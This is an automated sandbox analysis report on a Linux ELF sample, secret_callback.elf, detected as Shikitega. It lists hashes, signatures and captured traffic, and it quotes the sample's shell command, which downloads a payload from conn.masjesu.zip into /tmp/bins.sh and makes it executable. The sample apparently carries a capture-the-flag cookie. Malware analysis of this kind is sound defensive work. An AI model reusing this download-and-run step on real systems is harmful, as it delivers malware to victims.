Linux Analysis Report
secret_callback.elf

General Information

Sample name: secret_callback.elf
Analysis ID: 1686590
Has dependencies: false
MD5: c4e59526ee249153efb3fe9f9afc0933
SHA1: 2392aeac2a203ce1c94124bb9a61e67e82a35f2c
SHA256: dc8721efdf3cc1e6a275eea7d717930289eff30c49dba8ffd47711fb8d85fa2e
Tags: elfuser-hadi
Infos: yara

Detection

Shikitega
Score: 56
Range: 0 - 100

Signatures

Multi AV Scanner detection for submitted file
Yara detected Shikitega
Creates hidden files and/or directories
Executes commands using a shell command-line interpreter
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Reads the 'hosts' file potentially containing internal network hosts
Sample contains only a LOAD segment without any section mappings
Uses the "uname" system call to query kernel version information (possible evasion)

Classification

AV Detection

Source: secret_callback.elf Virustotal: Detection: 21%
Source: secret_callback.elf ReversingLabs: Detection: 25%
Source: /usr/bin/curl (PID: 6244) Reads hosts file: /etc/hosts
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.43
Source: unknown TCP traffic detected without corresponding DNS query: 109.202.202.202
Source: unknown TCP traffic detected without corresponding DNS query: 91.189.91.42
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu HTTP/1.1
  Host: conn.masjesu.zip
  User-Agent: curl/7.68.0
  Accept: */*
  Cookie: result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D
Source: global traffic DNS traffic detected: DNS query: conn.masjesu.zip
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found
  Server: nginx/1.18.0 (Ubuntu)
  Date: Sat, 10 May 2025 06:16:08 GMT
  Content-Type: text/html
  Content-Length: 153
  Connection: keep-alive
  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.22.1</center></body></html>
Source: unknown Network traffic detected: HTTP traffic on port 43928 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42836 -> 443
Source: LOAD without section mappings Program segment: 0x8048000
Source: classification engine Classification label: mal56.troj.linELF@0/1@2/0
Source: /usr/bin/curl (PID: 6244) Directory: /root/.curlrc
Source: /tmp/secret_callback.elf (PID: 6243) Shell command executed: /bin/sh -c "curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b 'result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D' -o /tmp/bins.sh 2>/dev/null && chmod +x /tmp/bins.sh"
Source: /bin/sh (PID: 6244) Curl executable: /usr/bin/curl -> curl -s http://conn.masjesu.zip/bins/ah3GCHQFBLXrnPxmcuw3C5mVztXIAcFayu -b result=flag%7BV3RY_S3CR3T_C4LLB4CK%7D -o /tmp/bins.sh
Source: /usr/bin/curl (PID: 6244) Queries kernel information via 'uname'

Stealing of Sensitive Information

Source: Yara match File source: secret_callback.elf, type: SAMPLE

Remote Access Functionality

Source: Yara match File source: secret_callback.elf, type: SAMPLE